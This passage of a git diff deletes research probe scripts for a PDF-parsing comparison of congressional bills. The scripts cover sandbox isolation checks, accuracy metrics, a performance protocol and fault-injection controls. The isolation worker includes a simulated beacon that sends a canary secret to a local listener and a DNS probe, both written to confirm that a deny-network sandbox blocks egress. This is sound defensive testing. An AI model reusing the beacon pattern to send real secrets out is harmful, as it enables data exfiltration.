1) -(allow default) -(deny network*) -""" - -WORKER = r''' -"""Runs INSIDE the sandbox. Fires the known-bad beacon, probes an external host, then does -real work -- a full PDF comparison -- which must still succeed with networking denied.""" -import hashlib, json, socket, sys, urllib.request -from pathlib import Path - -REPO = Path(sys.argv[1]) -sys.path.insert(0, str(REPO / "src")) -sys.path.insert(0, str(REPO / "docs/research/pdf-backend-bakeoff/probes")) - -out = {} - -# 1. Known-bad beacon. Must NOT reach the listener. -try: - urllib.request.urlopen( - f"http://127.0.0.1:{sys.argv[2]}/isolation-knownbad?secret={sys.argv[3]}", timeout=5 - ).read() - out["knownbad_request_raised"] = False -except Exception as exc: - out["knownbad_request_raised"] = True - out["knownbad_error"] = type(exc).__name__ - -# 2. External host. Must fail to resolve. -try: - socket.gethostbyname("www.govinfo.gov") - out["external_resolved"] = True -except Exception as exc: - out["external_resolved"] = False - out["external_error"] = type(exc).__name__ - -# 3. Real work: a full PDF comparison through the production entry point. -try: - from deltatrack.compare.pdf import compare_pdfs - v1 = (REPO / "tests/corpus/118-hr-4366/1_reported-in-house.pdf").read_bytes() - v2 = (REPO / "tests/corpus/118-hr-4366/2_engrossed-in-house.pdf").read_bytes() - canon = compare_pdfs(v1, v2) - blob = json.dumps(canon, sort_keys=True, default=str) - out["comparison_ok"] = True - out["comparison_sha256"] = hashlib.sha256(blob.encode()).hexdigest() - out["n_changes"] = len(canon.get("changes") or []) -except Exception as exc: - out["comparison_ok"] = False - out["comparison_error"] = f"{type(exc).__name__}: {exc}" - -print(json.dumps(out)) -''' - - -class Server: - def __init__(self): - self.proc = None - self.lines: list[str] = [] - - def __enter__(self): - self.proc = subprocess.Popen( - [sys.executable, str(PROBES / "serve.py"), "--port", str(PORT), "--seconds", "600"], - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - text=True, - bufsize=1, - ) - threading.Thread(target=self._drain, daemon=True).start() - for _ in range(80): - if any("listening" in x for x in self.lines): - return self - time.sleep(0.1) - raise RuntimeError("server did not start") - - def _drain(self): - for line in self.proc.stdout: - self.lines.append(line.rstrip()) - - def __exit__(self, *_e): - if self.proc: - self.proc.terminate() - self.proc.wait(timeout=10) - - def received(self, needle: str) -> bool: - return any(needle in x for x in self.lines) - - -def docker_available() -> bool: - if not shutil.which("docker"): - return False - r = subprocess.run(["docker", "info"], capture_output=True, timeout=30) - return r.returncode == 0 - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument( - "--out", type=Path, default=REPO / "docs/research/pdf-backend-bakeoff/results/confirm_isolation.json" - ) - args = ap.parse_args() - - tmp = Path(os.environ.get("CLAUDE_JOB_DIR", "/tmp")) / "tmp" - tmp.mkdir(parents=True, exist_ok=True) - profile = tmp / "nonet.sb" - profile.write_text(SANDBOX_PROFILE) - worker = tmp / "isolation_worker.py" - worker.write_text(WORKER) - - results: dict = { - "primary": "macOS sandbox-exec (deny network*)", - "canaries": {"sandboxed": CANARY_SANDBOXED, "liveness": CANARY_LIVENESS}, - } - - with Server() as server: - # Control B: observer liveness, OUTSIDE the sandbox, overlapping window. - import urllib.request - - try: - urllib.request.urlopen( - f"http://127.0.0.1:{PORT}/isolation-liveness?secret={CANARY_LIVENESS}", timeout=10 - ).read() - except Exception as exc: # noqa: BLE001 - results["liveness_request_error"] = f"{type(exc).__name__}: {exc}" - - # The run under test, carrying control A inside it. - t0 = time.perf_counter() - proc = subprocess.run( - [ - "sandbox-exec", - "-f", - str(profile), - sys.executable, - str(worker), - str(REPO), - str(PORT), - CANARY_SANDBOXED, - ], - capture_output=True, - text=True, - timeout=900, - ) - results["sandboxed_elapsed_s"] = round(time.perf_counter() - t0, 2) - results["sandboxed_returncode"] = proc.returncode - try: - results["sandboxed"] = json.loads(proc.stdout.strip().splitlines()[-1]) - except Exception: # noqa: BLE001 - results["sandboxed"] = {} - results["sandboxed_stdout"] = proc.stdout[-2000:] - results["sandboxed_stderr"] = proc.stderr[-2000:] - - time.sleep(3) - results["server_saw_liveness"] = server.received(CANARY_LIVENESS) - results["server_saw_sandboxed_knownbad"] = server.received(CANARY_SANDBOXED) - - # The unsandboxed comparison, for output identity: isolation must not change the answer. - try: - sys.path.insert(0, str(REPO / "src")) - import hashlib - - from deltatrack.compare.pdf import compare_pdfs - - canon = compare_pdfs( - (REPO / "tests/corpus/118-hr-4366/1_reported-in-house.pdf").read_bytes(), - (REPO / "tests/corpus/118-hr-4366/2_engrossed-in-house.pdf").read_bytes(), - ) - blob = json.dumps(canon, sort_keys=True, default=str) - results["unsandboxed_comparison_sha256"] = hashlib.sha256(blob.encode()).hexdigest() - except Exception as exc: # noqa: BLE001 - results["unsandboxed_comparison_error"] = f"{type(exc).__name__}: {exc}" - - sb = results.get("sandboxed", {}) - checks = { - "observer_liveness (unsandboxed beacon ARRIVED)": results.get("server_saw_liveness") is True, - "known_bad_inside_sandbox (beacon did NOT arrive)": results.get("server_saw_sandboxed_knownbad") is False, - "external_host_unresolvable_inside_sandbox": sb.get("external_resolved") is False, - "comparison_succeeded_with_network_denied": sb.get("comparison_ok") is True, - "output_identical_to_unsandboxed": ( - sb.get("comparison_sha256") is not None - and sb.get("comparison_sha256") == results.get("unsandboxed_comparison_sha256") - ), - } - results["checks"] = checks - results["verdict"] = "PASS" if all(checks.values()) else "VOID / FAIL" - - # The stronger claim, attempted rather than inferred. - if docker_available(): - results["linux_container"] = "docker daemon available -- run --network none separately" - else: - results["linux_container"] = "NOT RUN -- docker daemon unavailable at execution time" - - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(results, indent=1)) - - print("\nEnvironment isolation, macOS sandbox-exec (deny network*)") - for k, v in checks.items(): - print(f" {'PASS' if v else 'FAIL'} {k}") - print(f"\nverdict: {results['verdict']}") - print(f"linux container: {results['linux_container']}") - print(f"wrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/confirm_metrics.py b/docs/research/pdf-backend-bakeoff/probes/confirm_metrics.py deleted file mode 100644 index 00a02d60..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/confirm_metrics.py +++ /dev/null @@ -1,262 +0,0 @@ -"""Concern B metrics for the confirmatory run, none of which may use PDFium as truth. - -PRE-REGISTRATION-CONFIRMATORY.md, "Concern B -- independent document accuracy". - - B1 text recovery F1 vs the XML body (existing, reused) - B2 heading-LABEL recovery F1 vs the XML tree (new at population scale) - B3a line-number self-consistency vs the document itself (new; no reference) - B5 amount -> heading association vs the XML tree (new) - B6 parent/child heading accuracy vs the XML tree (new) - -Two things this module deliberately does NOT do: - - * It never reads the incumbent. The exploratory line-number metric scored against - PDFium's own line-number set (score_phase1.score_document passes the incumbent's set - as `reference`), which makes it a parity measurement, not an accuracy one. It now - lives in Concern A. B3a replaces it with a property of the document: a page's margin - numbers must form a gap-free run, which needs no external oracle at all. - - * It never compares heading LEVELS. The two pipelines assign different level names to - the same objects -- the XML's `agency` holds "Military construction, air force", - which the PDF calls an `account` -- and a level-by-level comparison produced a false - reversal during the audit. Every heading metric here is level-agnostic by - pre-commitment. - -B2 is where "found the heading" stops. B5 and B6 exist because a backend can find every -heading and attach them all wrongly, and attachment is what puts an amount under the -right account in the financial tables. -""" - -from __future__ import annotations - -import re -import sys -from collections import Counter -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -from deltatrack.bill_tree import normalize_bill # noqa: E402 -from deltatrack.formatters.canonical import _pdf_tree_payload # noqa: E402 -from deltatrack.formatters.text_serializer import build_xml_full_text # noqa: E402 -from deltatrack.parsers.pdf_anchors import extract_anchors # noqa: E402 -from deltatrack.parsers.pdf_text import pdf_full_text # noqa: E402 - -# Level-agnostic heading sets. The PDF and XML pipelines name levels differently, so the -# two sets are not the same strings -- they are the same OBJECTS on each side. -PDF_HEADING_KINDS = ("account", "agency", "grouping") -XML_HEADING_LEVELS = ("account", "agency", "heading") - -_AMOUNT = re.compile(r"\$[\d,]+(?:\.\d+)?") - - -def norm_label(s: str | None) -> str: - return " ".join((s or "").upper().replace(",", "").replace(".", "").split()) - - -def f1(hit: int, n_cand: int, n_ref: int) -> dict: - p = hit / n_cand if n_cand else 0.0 - r = hit / n_ref if n_ref else 0.0 - return { - "f1": round(2 * p * r / (p + r), 5) if (p + r) else 0.0, - "precision": round(p, 5), - "recall": round(r, 5), - "matched": hit, - "n_candidate": n_cand, - "n_reference": n_ref, - } - - -# ---------- shared tree flattening ------------------------------------------- - - -def _flatten(nodes: list[dict]) -> list[tuple[dict, list[dict]]]: - """(node, ancestors-outermost-first) for every node, depth-first.""" - out: list[tuple[dict, list[dict]]] = [] - stack: list[tuple[dict, list[dict]]] = [(n, []) for n in reversed(nodes)] - while stack: - node, anc = stack.pop() - out.append((node, anc)) - for child in reversed(node.get("children") or []): - stack.append((child, anc + [node])) - return out - - -def _heading_of(node: dict, ancestors: list[dict], levels: tuple[str, ...]) -> str | None: - """Nearest heading-ish label at or above `node`, or None.""" - for cand in [node] + list(reversed(ancestors)): - if cand.get("level") in levels and cand.get("label"): - return norm_label(cand["label"]) - return None - - -def _parent_heading_of(ancestors: list[dict], levels: tuple[str, ...]) -> str: - """Nearest heading-ish ancestor label, "" for a root-level heading.""" - for cand in reversed(ancestors): - if cand.get("level") in levels and cand.get("label"): - return norm_label(cand["label"]) - return "" - - -# ---------- XML side (the reference) ----------------------------------------- - - -def xml_reference(xml_path: Path) -> dict: - """Heading labels, amount->heading map and heading->parent map, from the XML tree. - - DeltaTrack#11 caveat travels with the caller: this reads the PARSER tree, which drops - . Documents carrying one are reported in their own stratum for B2/B5/B6 - and excluded from the primary figure. B1 is unaffected -- its reference is a raw - itertext walk that includes quoted-block text. - """ - v = normalize_bill(xml_path) - _, _, tree = build_xml_full_text(v, v) - flat = _flatten(list(tree["v1"])) - - labels: set[str] = set() - parent: dict[str, str] = {} - amounts: Counter = Counter() - assoc: Counter = Counter() - - for node, anc in flat: - lab = norm_label(node.get("label")) - if node.get("level") in XML_HEADING_LEVELS and lab: - labels.add(lab) - parent.setdefault(lab, _parent_heading_of(anc, XML_HEADING_LEVELS)) - head = _heading_of(node, anc, XML_HEADING_LEVELS) - for amt in node.get("own_amounts") or []: - amounts[amt] += 1 - if head is not None: - assoc[(amt, head)] += 1 - - return {"labels": labels, "parent": parent, "amounts": amounts, "assoc": assoc} - - -def xml_has_quoted_block(xml_path: Path) -> bool: - return "quoted-block" in xml_path.read_text(errors="ignore") - - -# ---------- PDF side (the candidate) ----------------------------------------- - - -def pdf_structure(pages) -> dict: - anchors = extract_anchors(pages) - text, offsets = pdf_full_text(pages) - nodes = _pdf_tree_payload(tuple(anchors), offsets, text) - flat = _flatten(nodes) - - labels: set[str] = set() - parent: dict[str, str] = {} - amounts: Counter = Counter() - assoc: Counter = Counter() - - for node, anc in flat: - lab = norm_label(node.get("label")) - if node.get("level") in PDF_HEADING_KINDS and lab: - labels.add(lab) - parent.setdefault(lab, _parent_heading_of(anc, PDF_HEADING_KINDS)) - head = _heading_of(node, anc, PDF_HEADING_KINDS) - for amt in node.get("own_amounts") or []: - amounts[amt] += 1 - if head is not None: - assoc[(amt, head)] += 1 - - # Anchor labels are the B2 candidate set: extract_anchors is the product's own - # heading detector, and _pdf_tree_payload can synthesize interior nodes that are not - # detected headings. Using anchors keeps B2 a measurement of detection. - anchor_labels = {norm_label(a.text) for a in anchors if a.kind in PDF_HEADING_KINDS and a.text} - - return { - "labels": anchor_labels, - "tree_labels": labels, - "parent": parent, - "amounts": amounts, - "assoc": assoc, - "n_anchors": len(anchors), - } - - -# ---------- the metrics ------------------------------------------------------- - - -def b2_heading_labels(pdf: dict, ref: dict) -> dict: - """B2 -- heading LABEL recovery. Says nothing about whether they are attached right.""" - hit = len(pdf["labels"] & ref["labels"]) - return f1(hit, len(pdf["labels"]), len(ref["labels"])) - - -def b3a_line_number_self_consistency(pages, scored_pages: set[int] | None = None) -> dict: - """B3a -- a page's recovered margin numbers must form a gap-free run. - - No external reference: GPO numbers each page's body lines from 1 upward, so - `|S| / max(S)` is 1.0 exactly when nothing is missing and nothing is invented, and it - penalizes both directions. Pages with no numbers at all (covers, tables of contents) - are scored only when another backend in the same run found numbers there -- - `scored_pages` carries that union, so a page nobody can number is not counted against - anyone, and a page one backend CAN number counts against those that cannot. - """ - per_page: dict[int, float] = {} - starts_at_one = 0 - for page in pages: - nums = {ln.line_number for ln in page.print_lines if ln.line_number is not None} - if not nums: - if scored_pages is not None and page.page_number in scored_pages: - per_page[page.page_number] = 0.0 - continue - if scored_pages is not None and page.page_number not in scored_pages: - continue - top = max(nums) - per_page[page.page_number] = len(nums) / top if top else 0.0 - if min(nums) == 1: - starts_at_one += 1 - if not per_page: - return {"score": None, "n_pages": 0, "starts_at_one_rate": None} - return { - "score": round(sum(per_page.values()) / len(per_page), 5), - "n_pages": len(per_page), - "starts_at_one_rate": round(starts_at_one / len(per_page), 5), - "worst_pages": sorted(per_page.items(), key=lambda kv: kv[1])[:5], - } - - -def numbered_pages(pages) -> set[int]: - return {p.page_number for p in pages if any(ln.line_number is not None for ln in p.print_lines)} - - -def b5_amount_association(pdf: dict, ref: dict) -> dict: - """B5 -- of the amounts BOTH sides found, how many sit under the same heading? - - Restricted to the shared amount multiset on purpose: pooling in amounts only one side - found would fold a DETECTION difference into an ASSOCIATION metric and make it - uninterpretable. Detection is B1's and Concern A's business. - """ - shared = pdf["amounts"] & ref["amounts"] - if not shared: - return {"f1": None, "n_reference": 0, "note": "no shared amounts"} - keep = set(shared) - p = Counter({k: c for k, c in pdf["assoc"].items() if k[0] in keep}) - r = Counter({k: c for k, c in ref["assoc"].items() if k[0] in keep}) - hit = sum((p & r).values()) - return f1(hit, sum(p.values()), sum(r.values())) - - -def b6_parent_child(pdf: dict, ref: dict) -> dict: - """B6 -- for headings both sides found, is the immediate heading parent the same?""" - shared = pdf["labels"] & ref["labels"] - if not shared: - return {"accuracy": None, "n": 0} - agree = sum(1 for lab in shared if pdf["parent"].get(lab, "") == ref["parent"].get(lab, "")) - return { - "accuracy": round(agree / len(shared), 5), - "n": len(shared), - "agree": agree, - "disagree_sample": sorted( - (lab, pdf["parent"].get(lab, ""), ref["parent"].get(lab, "")) - for lab in shared - if pdf["parent"].get(lab, "") != ref["parent"].get(lab, "") - )[:5], - } diff --git a/docs/research/pdf-backend-bakeoff/probes/confirm_perf.py b/docs/research/pdf-backend-bakeoff/probes/confirm_perf.py deleted file mode 100644 index b49093a2..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/confirm_perf.py +++ /dev/null @@ -1,158 +0,0 @@ -"""Concern D: performance, under a protocol that can declare its own run void. - -PRE-REGISTRATION-CONFIRMATORY.md, "Concern D -- performance". - -The exploratory gate-9 verdict for pdfminer did not reproduce: 37.9 s on first measurement, -69.2 s on re-run, against a 60 s ceiling, and the published figure turned out to be the -outlier. Nothing about that was visible from the number itself, which is why the machine -state is now part of the measurement rather than context for it. - -Frozen conditions, each of which can VOID the run rather than degrade it quietly: - - * load average < 1.0 at start, recorded with the result - * minimum of 5 trials; the MINIMUM is the estimator, not the mean - * CPU time recorded beside wall time; material divergence means contention - * one backend at a time, never concurrently - -A candidate whose min-of-5 straddles the 60 s ceiling is UNRESOLVED, never rounded to a -pass or a fail. That is the state pdfminer is in today and this protocol exists to keep it -honestly there rather than resolve it by luck. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/confirm_perf.py -""" - -from __future__ import annotations - -import argparse -import json -import os -import resource -import statistics -import sys -import time -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] - -LOAD_CEILING = 1.0 -TRIALS = 5 -GATE_D1_SECONDS = 60.0 -GATE_D2_MULTIPLE = 3.0 -LARGEST = REPO / "tests/corpus/119-hr-1/1_reported-in-house.pdf" - - -def load_average() -> tuple[float, float, float]: - return os.getloadavg() - - -def native_trial(backend: str, pdf: Path) -> dict: - """One extraction, wall and CPU time. CPU is children-inclusive: the JS backends run - in a subprocess, and charging only this process's CPU would report ~0 for them.""" - before = resource.getrusage(resource.RUSAGE_CHILDREN) - self_before = resource.getrusage(resource.RUSAGE_SELF) - t0 = time.perf_counter() - from contract import run_backend - - pages, _summary = run_backend(backend, pdf) - wall = time.perf_counter() - t0 - after = resource.getrusage(resource.RUSAGE_CHILDREN) - self_after = resource.getrusage(resource.RUSAGE_SELF) - cpu = (after.ru_utime - before.ru_utime) + (after.ru_stime - before.ru_stime) - cpu += (self_after.ru_utime - self_before.ru_utime) + (self_after.ru_stime - self_before.ru_stime) - return {"wall_s": round(wall, 3), "cpu_s": round(cpu, 3), "n_pages": len(pages)} - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out", type=Path, default=REPO / "docs/research/pdf-backend-bakeoff/results/confirm_perf.json") - ap.add_argument("--trials", type=int, default=TRIALS) - ap.add_argument("--backends", default="pdfium-native,pdfium-wasm,pdfminer") - args = ap.parse_args() - - sys.path.insert(0, str(PROBES)) - - load_start = load_average() - voided = load_start[0] >= LOAD_CEILING - print(f"load average at start: {load_start[0]:.2f} (ceiling {LOAD_CEILING})", file=sys.stderr) - if voided: - print(" -> RUN IS VOID by the frozen idle-machine condition.", file=sys.stderr) - print(" Measuring anyway, and publishing it as VOID rather than as a result.", file=sys.stderr) - - results: dict = { - "document": str(LARGEST.relative_to(REPO)), - "load_average_start": list(load_start), - "load_ceiling": LOAD_CEILING, - "trials": args.trials, - "estimator": "minimum of trials", - "void": voided, - "void_reason": "load average at start >= 1.0" if voided else None, - "gates": {"D1_seconds": GATE_D1_SECONDS, "D2_multiple_of_incumbent": GATE_D2_MULTIPLE}, - "backends": {}, - } - - for backend in args.backends.split(","): - trials = [] - for i in range(args.trials): - try: - t = native_trial(backend, LARGEST) - except Exception as exc: # noqa: BLE001 - trials.append({"error": f"{type(exc).__name__}: {exc}"}) - print(f" {backend} trial {i + 1}: ERROR {exc}", file=sys.stderr) - continue - trials.append(t) - print( - f" {backend:14} trial {i + 1}/{args.trials}: wall={t['wall_s']:7.2f}s cpu={t['cpu_s']:7.2f}s", - file=sys.stderr, - ) - walls = [t["wall_s"] for t in trials if "wall_s" in t] - cpus = [t["cpu_s"] for t in trials if "cpu_s" in t] - if not walls: - results["backends"][backend] = {"trials": trials, "error": "no successful trial"} - continue - entry = { - "trials": trials, - "min_s": min(walls), - "median_s": round(statistics.median(walls), 3), - "max_s": max(walls), - "spread_s": round(max(walls) - min(walls), 3), - "min_cpu_s": min(cpus) if cpus else None, - "cpu_wall_ratio_at_min": round(min(cpus) / min(walls), 2) if cpus and min(walls) else None, - } - results["backends"][backend] = entry - - inc = results["backends"].get("pdfium-native", {}).get("min_s") - results["load_average_end"] = list(load_average()) - for backend, entry in results["backends"].items(): - if "min_s" not in entry: - continue - d1 = entry["min_s"] < GATE_D1_SECONDS - straddles = entry["min_s"] < GATE_D1_SECONDS <= entry.get("max_s", entry["min_s"]) - entry["D1"] = "UNRESOLVED (min-of-N straddles the ceiling)" if straddles else ("pass" if d1 else "fail") - if inc: - entry["D2_ratio_to_incumbent"] = round(entry["min_s"] / inc, 2) - entry["D2"] = "pass" if entry["min_s"] <= GATE_D2_MULTIPLE * inc else "fail" - if voided: - entry["D1"] = f"VOID -- {entry['D1']}" - entry["D2"] = f"VOID -- {entry.get('D2', 'n/a')}" - - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(results, indent=1)) - - print(f"\n{'backend':16} {'min':>8} {'median':>8} {'max':>8} {'spread':>8} {'cpu/wall':>9} D1 / D2") - for backend, e in results["backends"].items(): - if "min_s" not in e: - print(f"{backend:16} {e.get('error')}") - continue - print( - f"{backend:16} {e['min_s']:8.2f} {e['median_s']:8.2f} {e['max_s']:8.2f} " - f"{e['spread_s']:8.2f} {e['cpu_wall_ratio_at_min'] or 0:9.2f} {e['D1']} / {e.get('D2', 'n/a')}" - ) - print(f"\nload average: start {load_start[0]:.2f} -> end {results['load_average_end'][0]:.2f}") - if voided: - print("VOID: this run does not satisfy the frozen idle-machine condition.") - print(f"wrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/confirm_sabotage.py b/docs/research/pdf-backend-bakeoff/probes/confirm_sabotage.py deleted file mode 100644 index 50440e34..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/confirm_sabotage.py +++ /dev/null @@ -1,337 +0,0 @@ -"""B0 -- per-metric sabotage controls. A metric that cannot fail cannot rank anything. - -PRE-REGISTRATION-CONFIRMATORY.md, "B0 -- harness sensitivity controls". - -One uniform glyph dropout is not a sufficient control. It garbles text (so B1 falls) but -barely disturbs where a heading sits (so B5 need not move), and a metric that survives it -may be blind rather than robust -- voiding it on that evidence would be its own false -negative. So each metric gets a sabotage that injects the specific fault that metric -claims to catch, applied to a candidate's glyph stream with seed 20260805. - - S1 B1 delete 5% of glyphs, uniformly at random - S2 B2 collapse the small-caps size band on heading lines - S3 B3a delete the margin-number glyph run on 5% of numbered lines - S4 B5 move heading lines down one line-height -- text intact, attachment wrong - S5 B6 delete agency headings only, so their children reparent - SA1 A1 perturb one digit of one amount - SA2 A2 delete one printed line's glyphs - SA3 A4 delete a single glyph - -S4 and S5 carry SEPARABILITY requirements, and those are the point rather than -decoration. S4 leaves every heading label intact and only moves where it sits: if B2 -falls as far as B5 does, B2 and B5 are measuring the same thing and the association -metric adds nothing. Same for S5 against B6. That verdict -- "not separable" -- is a -different finding from either metric being blind, and must not be written as one. -""" - -from __future__ import annotations - -import random -import re -import statistics -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import reconstruct as R # noqa: E402 -from contract import BASELINE, CP, SIZE, X0, Y0, Y1, PdfPage # noqa: E402 - -SEED = 20260805 -_NUMBERED = re.compile(r"^(\d{1,2}) ") - - -def _clone(pages: list[PdfPage]) -> list[PdfPage]: - return [PdfPage(page_number=p.page_number, width=p.width, height=p.height, glyphs=list(p.glyphs)) for p in pages] - - -def _rows(page: PdfPage) -> list[list]: - """Baseline-clustered rows, memoized ON the page object. - - Cached as an attribute rather than in a module dict keyed by id(): a freed page's id - can be reused by a later one, which would silently serve another document's rows. The - attribute lives and dies with the object it describes. Every sabotage clusters the - same pages, and clustering is O(n log n) over ~3M glyphs on the largest bill. - """ - cached = getattr(page, "_rows_cache", None) - if cached is not None and cached[0] == len(page.glyphs): - return cached[1] - rows = R.cluster_lines(page) - page._rows_cache = (len(page.glyphs), rows) - return rows - - -_SMALLCAPS_LO, _SMALLCAPS_HI = 0.70, 0.90 - - -def _heading_rows(page: PdfPage) -> list[list]: - """Rows carrying GPO's faux small-caps signal: two sizes inside ONE printed line. - - Measured, not assumed. On 118-hr-4366 the body face is 14pt and an account heading is - 14pt initials with an 11.2pt body -- a ratio of exactly 0.800 -- and those heading - lines are the only non-chrome rows on their page carrying more than one size. - - An earlier version of this function looked for a size step UP against the page's - dominant size, which is backwards: the heading's small caps are SMALLER than the body - face, so it matched nothing, S2/S4 silently became no-ops, and their metrics would - have been declared void on a harness bug rather than on a blind metric. That is the - exact failure B0 exists to catch, and here it caught the control itself. - """ - rows = _rows(page) - if not rows: - return [] - body = R._dominant_size(rows) - out = [] - for row in rows: - sizes = sorted({round(g[SIZE], 1) for g in row}) - if len(sizes) < 2: - continue - if not (_SMALLCAPS_LO <= sizes[0] / sizes[-1] <= _SMALLCAPS_HI): - continue - if R.is_chrome(R._line_text(row), row, body): - continue - out.append(row) - return out - - -def _line_height(page: PdfPage) -> float: - rows = _rows(page) - baselines = sorted({round(row[0][BASELINE], 2) for row in rows if row}, reverse=True) - gaps = [a - b for a, b in zip(baselines, baselines[1:], strict=False) if 4.0 < a - b < 30.0] - return statistics.median(gaps) if gaps else 12.0 - - -# ---------- Concern B sabotages ---------------------------------------------- - - -def s1_drop_glyphs(pages: list[PdfPage], rate: float = 0.05) -> list[PdfPage]: - """S1 (targets B1): uniform glyph dropout. Garbles tokens; leaves layout alone.""" - rng = random.Random(SEED) - out = _clone(pages) - for page in out: - page.glyphs = [g for g in page.glyphs if rng.random() >= rate] - return out - - -def s2_collapse_size_band(pages: list[PdfPage]) -> list[PdfPage]: - """S2 (targets B2): flatten every heading line to one size. - - This is the real PDF.js failure mode, not an invented one: `getTextContent()` merges - the alternating 14pt/11.2pt runs of a small-caps heading and reports a single size, so - the band ADR 0012's heading recovery reads collapses. Reproducing it deliberately is - what proves B2 can see it. - """ - out = _clone(pages) - for page in out: - med = {} - for row in _heading_rows(page): - m = statistics.median([g[SIZE] for g in row]) - for g in row: - med[id(g)] = m - if not med: - continue - page.glyphs = [(g[:SIZE] + (med[id(g)],) + g[SIZE + 1 :]) if id(g) in med else g for g in page.glyphs] - return out - - -def s3_drop_margin_numbers(pages: list[PdfPage], rate: float = 0.05) -> list[PdfPage]: - """S3 (targets B3a): delete the leading margin-number glyphs on some numbered lines.""" - rng = random.Random(SEED) - out = _clone(pages) - for page in out: - drop: set[int] = set() - for row in _rows(page): - text = R._line_text(row) - if not _NUMBERED.match(text): - continue - if rng.random() >= rate: - continue - ordered = sorted(row, key=lambda g: g[X0]) - for g in ordered: - if chr(g[CP]).isdigit(): - drop.add(id(g)) - elif drop: - break - if drop: - page.glyphs = [g for g in page.glyphs if id(g) not in drop] - return out - - -def s4_rotate_heading_slots(pages: list[PdfPage]) -> list[PdfPage]: - """S4 (targets B5): give each heading the NEXT heading's slot, cyclically. - - The purest attachment-only fault available. Every heading keeps its exact glyphs, and - every heading still lands where a heading was, so detection is untouched; all that - changes is which block each one precedes. B5 must fall; B2 should barely move. - - Two earlier designs are recorded because each failed for a reason worth keeping: - - * shift heading lines down one line-height -- drops them into the next line's - baseline cluster and garbles both lines. B1 fell 0.108 and B2 0.443 against B5's - 0.461: it corrupted the document rather than its structure. - * swap each heading with the row below it -- cleaner, but the row below is usually - a body line of the heading's OWN block, so the heading lands mid-sentence and - stops being detected. B2 moved 0.053 against a 0.020 separability rule. - - This is the last revision of S4. If separability still fails over the population, the - verdict is NOT SEPARABLE and it is reported as such rather than tuned away. - """ - out = _clone(pages) - slots: list[tuple[int, float, list]] = [] - for pi, page in enumerate(out): - for row in _heading_rows(page): - if row: - slots.append((pi, row[0][BASELINE], row)) - if len(slots) < 2: - return out - - moves: list[tuple[int, float, list]] = [] - for i, (_pi, base, row) in enumerate(slots): - tpi, tbase, _ = slots[(i + 1) % len(slots)] - moves.append((tpi, tbase - base, row)) - - victims = {id(g) for _t, _d, row in moves for g in row} - for page in out: - page.glyphs = [g for g in page.glyphs if id(g) not in victims] - for tpi, delta, row in moves: - out[tpi].glyphs.extend( - g[:Y0] + (g[Y0] + delta, g[Y0 + 1], g[Y1] + delta, g[BASELINE] + delta) + g[BASELINE + 1 :] for g in row - ) - return out - - -def s2b_delete_heading_lines(pages: list[PdfPage], rate: float = 0.20) -> list[PdfPage]: - """S2b (targets B2): delete a fraction of heading lines outright. - - The direct injection of the fault B2 names -- "this backend did not recover the - heading label". S2's size-band collapse is kept alongside it because its RESULT is - informative (see its docstring), but a metric must be controlled against the fault it - claims to catch, not only against one mechanism that could cause it. - """ - rng = random.Random(SEED) - out = _clone(pages) - for page in out: - drop: set[int] = set() - for row in _heading_rows(page): - if rng.random() < rate: - drop.update(id(g) for g in row) - if drop: - page.glyphs = [g for g in page.glyphs if id(g) not in drop] - return out - - -def s5_drop_agency_headings(pages: list[PdfPage]) -> list[PdfPage]: - """S5 (targets B6): delete agency headings only, so accounts reparent upward. - - Two-pass: reconstruct the clean pages to find which printed lines the product calls - `agency`, then delete those lines' glyphs from the raw stream. Levels come from the - product's own detector, so the sabotage removes what B6 is about rather than what a - heuristic guesses. - """ - from deltatrack.parsers.pdf_anchors import extract_anchors - - clean, _ = R.reconstruct(pages, repaired=True) - victims = { - (a.page_number, a.line_number) - for a in extract_anchors(clean) - if a.kind == "agency" and a.line_number is not None - } - if not victims: - return _clone(pages) - - out = _clone(pages) - for page in out: - want = {ln for (pn, ln) in victims if pn == page.page_number} - if not want: - continue - # Locate the row by its own printed margin number rather than by a Line.geom - # baseline: geom is None on ordinary print lines, so a geom-keyed lookup finds - # nothing and the sabotage silently does nothing. - drop: set[int] = set() - for row in _rows(page): - m = _NUMBERED.match(R._line_text(row)) - if m and int(m.group(1)) in want: - drop.update(id(g) for g in row) - if drop: - page.glyphs = [g for g in page.glyphs if id(g) not in drop] - return out - - -# ---------- Concern A sabotages ---------------------------------------------- - - -def sa1_perturb_amount(pages: list[PdfPage]) -> list[PdfPage]: - """SA1 (targets A1): change one digit of one dollar amount.""" - out = _clone(pages) - for page in out: - for row in _rows(page): - ordered = sorted(row, key=lambda g: g[X0]) - text = "".join(chr(g[CP]) for g in ordered) - m = re.search(r"\$[\d,]{4,}", text) - if not m: - continue - for i in range(m.start() + 1, m.end()): - g = ordered[i] - if chr(g[CP]).isdigit(): - new_cp = ord("9") if chr(g[CP]) != "9" else ord("1") - tgt = id(g) - page.glyphs = [(new_cp,) + x[1:] if id(x) == tgt else x for x in page.glyphs] - return out - return out - - -def sa2_drop_line(pages: list[PdfPage]) -> list[PdfPage]: - """SA2 (targets A2): delete one printed line's glyphs, mid-document.""" - out = _clone(pages) - if not out: - return out - page = out[len(out) // 2] - rows = _rows(page) - body = [r for r in rows if len(r) > 20] - if not body: - return out - victim = {id(g) for g in body[len(body) // 2]} - page.glyphs = [g for g in page.glyphs if id(g) not in victim] - return out - - -def sa3_drop_one_glyph(pages: list[PdfPage]) -> list[PdfPage]: - """SA3 